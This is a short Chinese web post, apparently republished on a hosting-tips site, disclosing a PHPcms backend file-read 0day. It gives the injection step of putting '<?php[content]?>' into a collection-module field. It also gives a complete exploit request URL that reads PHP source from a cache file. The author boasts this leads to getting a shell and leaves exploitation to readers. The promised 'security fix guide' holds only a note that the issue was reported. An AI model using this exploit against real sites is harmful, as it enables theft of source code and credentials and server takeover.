后台采集里设置采集模块中title 或者其他的内容都可以 设置为<?php[内容]?>
然后用下面的代码就可以读取到php的源了。
index.php?clientid=name&url=./caches/caches_scan/caches_data/scan_bad_file.cache.php&_=1344175735957&m=collection&c=node&a=public_test_content&nodeid=1&pc_hash=xxxx
拿到源基本拿到shell不难了。具体如何利用看大家自己了。(别跟我说只会读数据库连接文件,并且还不能连),反正我是可以拿到shell。
修复:已提交给官方,等待补丁
PHPcms后台普通用户读文件0day漏洞深度解析与安全修复指南
未经允许不得转载:搬瓦工中文网 » PHPcms后台普通用户读文件0day漏洞深度解析与安全修复指南
相关推荐
- 如何在Ubuntu系统中轻松安装、更新和删除Snap包:新手必看的简单使用指南
- 如何在CentOS 6/7系统中使用Yum轻松安装PHP 7:详细步骤指南
- Linux服务器安全检查必备:十款高效工具全面扫描恶意软件与漏洞
- CentOS 7 PHP环境配置详解:GD库及其他常用插件安装全攻略
- 如何在CentOS 7系统中安装PHP GD库:详细步骤与实例解析
- 如何在命令行中快速获取并监控公网动态IP地址的实时变化
- Linux 性能优化必备:13款超实用网络监控工具详解
- Windows IIS应用程序池配置详细指南与性能优化技巧
- 如何在Ubuntu 16.04系统中为PyCharm创建桌面快捷方式:详细步骤指南
- Oracle Linux 与 CentOS:深度对比解析,企业级系统替代选择指南
搬瓦工中文网





